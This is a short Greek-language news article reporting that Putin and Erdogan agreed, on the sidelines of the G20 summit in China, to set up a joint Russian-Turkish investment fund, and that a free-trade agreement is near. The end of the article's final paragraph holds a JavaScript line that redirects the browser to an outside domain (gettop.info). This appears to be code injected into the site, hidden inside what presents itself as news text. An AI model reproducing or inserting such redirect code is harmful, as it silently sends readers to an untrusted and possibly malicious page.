Σε άλλο επίπεδο οι ρωσοτουρκικές σχέσεις-Δημιουργείται κοινό επενδυτικό ταμείο

0
8

 

Σε άλλο επίπεδο φαίνεται ότι περνούν οι ρωσοτουρκικές σχέσεις μετά την πρόσφατη αναθέρμανση τους. Όπως ανακοίνωσε ο Ρώσος υπουργός Οικονομίας Αλεξέι Ουλιουκάγεφ, ο πρόεδρος της Ρωσίας Βλαντίμιρ Πούτιν και ο Τούρκος ομόλογός του Ταγίπ Ερντογάν συμφώνησαν να δημιουργήσουν ένα κοινό ρωσοτουρκικό επενδυτικό ταμείο.

Οι δύο ηγέτες συναντήθηκαν στο περιθώριο της συνόδου κορυφής της G20 στην Κίνα.

«Ολοκληρώνουμε την εργασία για τον σχηματισμό ενός ρωσο-τουρκικού επενδυτικού ταμείου», δήλωσε ο Ουλιουκάγεφ. «Στο τέλος Αυγούστου, η Τουρκία έκανε τις απαραίτητες νομοθετικές αλλαγές για να δημιουργήσει έναν εταίρο αντίστοιχο του δικού μας ταμείου άμεσων επενδυσεων — το Τουρκικό ταμείο κρατικής περιουσίας.
Πιστεύω ότι κάποια στιγμή τον Οκτώβριο ή τον Νοέμβριο θα έχουμε έναν κατάλογο με προγράμματα και μια γραμμή πιστώσεων για να αρχίσουμε τη δουλειά».

Ο Ουλιουκάγεφ δήλωσε επίσης πως η Ρωσία και η Τουρκία πλησιάζουν στην ολοκλήρωση μιας συμφωνίας ελεύθερων συναλλαγών και πως για τον σκοπό αυτό θα συναντηθεί στα τέλη Οκτωβρίου με τον Τούρκο ομόλογό του Νιχάτ Ζεϊμπεκτζί. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here